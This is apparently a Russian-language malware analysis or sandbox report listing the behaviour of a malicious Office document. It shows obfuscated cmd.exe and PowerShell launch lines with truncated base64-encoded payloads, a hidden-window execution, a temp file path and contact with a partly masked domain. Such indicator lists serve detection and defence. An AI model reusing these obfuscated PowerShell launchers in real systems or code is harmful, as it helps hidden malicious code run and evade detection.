Техническая информация
- '<SYSTEM32>\cmd.exe' /C P^OW^ErS^he^LL -E WwBTAFkAcwBUAEUATQAuAHQARQBYAFQALgBFAE4AYwBPAGQASQBOAEcAXQA6ADoAVQBuAEkAYwBvAEQARQAuAGcARQB0AHMAVABSAEkAbgBHACgAWwBTAHkAcwBUAGUATQAuAEMATwBuAFYARQBSAFQAXQA6ADoAZgByAG8AbQBi...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{58ffe30f-421d-48f6-9993-9dee55e8b2ce}.tmp
- 'bu###adomes.com':443
- DNS ASK bu###adomes.com
- '<SYSTEM32>\cmd.exe' /C P^OW^ErS^he^LL -E WwBTAFkAcwBUAEUATQAuAHQARQBYAFQALgBFAE4AYwBPAGQASQBOAEcAXQA6ADoAVQBuAEkAYwBvAEQARQAuAGcARQB0AHMAVABSAEkAbgBHACgAWwBTAHkAcwBUAGUATQAuAEMATwBuAFYARQBSAFQAXQA6ADoAZgByAG8AbQBi...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -E WwBTAFkAcwBUAEUATQAuAHQARQBYAFQALgBFAE4AYwBPAGQASQBOAEcAXQA6ADoAVQBuAEkAYwBvAEQARQAuAGcARQB0AHMAVABSAEkAbgBHACgAWwBTAHkAcwBUAGUATQAuAEMATwBuAFYARQBSAFQAXQA6ADoAZgByAG8AbQBiAGEAUwBlADYANABTAF...
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding